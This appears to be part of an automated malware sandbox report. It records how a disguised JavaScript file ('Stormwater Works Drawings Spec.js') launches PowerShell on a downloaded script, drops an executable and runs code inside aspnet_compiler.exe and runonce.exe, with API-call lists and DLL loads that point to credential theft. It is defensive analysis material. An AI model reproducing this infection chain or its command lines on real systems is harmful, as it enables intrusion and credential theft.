Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62AB0 NtWaitForSingleObject,	4_2_00F62AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62BF0 NtAllocateVirtualMemory,	4_2_00F62BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62BE0 NtQueryValueKey,	4_2_00F62BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62BA0 NtEnumerateValueKey,	4_2_00F62BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62B80 NtQueryInformationFile,	4_2_00F62B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62CF0 NtOpenProcess,	4_2_00F62CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62CC0 NtQueryVirtualMemory,	4_2_00F62CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62CA0 NtQueryInformationToken,	4_2_00F62CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62C60 NtCreateKey,	4_2_00F62C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62C00 NtQueryInformationProcess,	4_2_00F62C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62DD0 NtDelayExecution,	4_2_00F62DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62DB0 NtEnumerateKey,	4_2_00F62DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F63D70 NtOpenThread,	4_2_00F63D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62D30 NtUnmapViewOfSection,	4_2_00F62D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62D10 NtMapViewOfSection,	4_2_00F62D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F63D10 NtOpenProcessToken,	4_2_00F63D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62D00 NtSetInformationFile,	4_2_00F62D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62EE0 NtQueueApcThread,	4_2_00F62EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62EA0 NtAdjustPrivilegesToken,	4_2_00F62EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62E80 NtReadVirtualMemory,	4_2_00F62E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62E30 NtWriteVirtualMemory,	4_2_00F62E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62FE0 NtCreateFile,	4_2_00F62FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62FB0 NtResumeThread,	4_2_00F62FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62FA0 NtQuerySection,	4_2_00F62FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62F90 NtProtectVirtualMemory,	4_2_00F62F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62F60 NtCreateProcessEx,	4_2_00F62F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_00F62F30 NtCreateSection,	4_2_00F62F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A35C0 NtCreateMutant,LdrInitializeThunk,	9_2_045A35C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A4650 NtSuspendThread,LdrInitializeThunk,	9_2_045A4650
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A4340 NtSetContextThread,LdrInitializeThunk,	9_2_045A4340
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_045A2C70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2C60 NtCreateKey,LdrInitializeThunk,	9_2_045A2C60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_045A2CA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_045A2D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_045A2D30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2DD0 NtDelayExecution,LdrInitializeThunk,	9_2_045A2DD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_045A2DF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2EE0 NtQueueApcThread,LdrInitializeThunk,	9_2_045A2EE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_045A2E80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2F30 NtCreateSection,LdrInitializeThunk,	9_2_045A2F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2FE0 NtCreateFile,LdrInitializeThunk,	9_2_045A2FE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2FB0 NtResumeThread,LdrInitializeThunk,	9_2_045A2FB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A39B0 NtGetContextThread,LdrInitializeThunk,	9_2_045A39B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2AD0 NtReadFile,LdrInitializeThunk,	9_2_045A2AD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2AF0 NtWriteFile,LdrInitializeThunk,	9_2_045A2AF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2B60 NtClose,LdrInitializeThunk,	9_2_045A2B60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_045A2BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2BE0 NtQueryValueKey,LdrInitializeThunk,	9_2_045A2BE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2BA0 NtEnumerateValueKey,LdrInitializeThunk,	9_2_045A2BA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A3010 NtOpenDirectoryObject,	9_2_045A3010
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A3090 NtSetValueKey,	9_2_045A3090
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2C00 NtQueryInformationProcess,	9_2_045A2C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2CC0 NtQueryVirtualMemory,	9_2_045A2CC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2CF0 NtOpenProcess,	9_2_045A2CF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A3D70 NtOpenThread,	9_2_045A3D70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A3D10 NtOpenProcessToken,	9_2_045A3D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2D00 NtSetInformationFile,	9_2_045A2D00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2DB0 NtEnumerateKey,	9_2_045A2DB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2E30 NtWriteVirtualMemory,	9_2_045A2E30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2EA0 NtAdjustPrivilegesToken,	9_2_045A2EA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2F60 NtCreateProcessEx,	9_2_045A2F60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2F90 NtProtectVirtualMemory,	9_2_045A2F90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2FA0 NtQuerySection,	9_2_045A2FA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2AB0 NtWaitForSingleObject,	9_2_045A2AB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_045A2B80 NtQueryInformationFile,	9_2_045A2B80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02629680 NtReadFile,	9_2_02629680
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02629780 NtDeleteFile,	9_2_02629780
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02629510 NtCreateFile,	9_2_02629510
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02629820 NtClose,	9_2_02629820
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_02629980 NtAllocateVirtualMemory,	9_2_02629980
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_0441F2CF NtReadVirtualMemory,	9_2_0441F2CF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 9_2_0441F8C4 NtMapViewOfSection,	9_2_0441F8C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F65130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F77E54 appears 85 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F1B970 appears 248 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00F9EA12 appears 84 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00FAF290 appears 103 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 045B7E54 appears 85 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 045EF290 appears 103 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 0455B970 appears 248 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 045A5130 appears 36 times
Source: C:\Windows\SysWOW64\runonce.exe	Code function: String function: 045DEA12 appears 84 times

Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr, cb60b9da33aec3a3b9ec2472d80be41ee.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe.1.dr, c405801f372761b2d9b950fa86a46e4a3.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.powershell.exe.1cfdb03c4a0.0.raw.unpack, cb60b9da33aec3a3b9ec2472d80be41ee.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 1.2.powershell.exe.1cfdb03c4a0.0.raw.unpack, c405801f372761b2d9b950fa86a46e4a3.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Stormwater Works Drawings Spec.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\downloaded_script.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Process created: C:\Windows\SysWOW64\runonce.exe "C:\Windows\SysWOW64\runonce.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\gIREEBsbXssxtwKkMKvDTBBLViqVuETHlLrFwnWJjmjJmQXPIXTAYTbEEcuPzNzWLUcNWAXpeeWFdBGY\xBjKgBCuI1jq.exe	Section loaded: iphlpapi.dll	Jump to behavior
